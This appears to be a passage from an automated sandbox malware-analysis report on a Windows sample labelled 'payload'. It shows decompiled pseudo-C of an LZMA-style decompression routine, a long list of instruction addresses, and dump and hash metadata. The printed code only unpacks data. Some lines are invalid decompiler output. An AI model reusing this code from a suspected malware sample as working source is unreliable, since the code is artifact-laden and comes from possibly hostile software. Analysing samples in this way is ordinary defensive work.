										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040697a
0x0040697a
0x0040697e
0x004069a3
0x004069ad
0x00000000
0x00406980
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698d
0x00406991
0x00406991
0x00406994
0x00406a6e
0x00406a6e
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00406a2c
0x00406a2c
0x00406a2c
0x004061c8
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x00000000
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a01
0x00406a05
0x00406bb4
0x00000000
0x00406bb4
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00406a26
0x00406a26
0x00000000
0x00000000
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x00000000
0x004063d1
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b4
0x00000000
0x00406396
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x004063ad
0x00000000
0x004065e3
0x004065e7
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x00000000
0x00000000
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x00000000
0x00000000
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00406701
0x00406705
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x00000000
0x0040671c
0x00406707
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x004069b0
0x004069b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00000000
0x00406a67
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00406a2c
0x00406a2c
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00000000
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406973
0x00406ba8
0x00406bca
0x00406bd0
0x00406bd2
0x00406bd9
0x00406bdb
0x00406be2
0x00406be6
0x00000000
0x004061d7
0x00406bdf
0x00406bdf
0x00000000
0x00406bdf
0x00406a2c
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00406b09
0x00000000
0x0040697e

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
Instruction ID: e89747aace1fce0fcb13a8d80e6f88749465aa03c559881c8099c8d07fdfb4d2
Opcode Fuzzy Hash: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
Instruction Fuzzy Hash: BE911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406690() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BE7))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
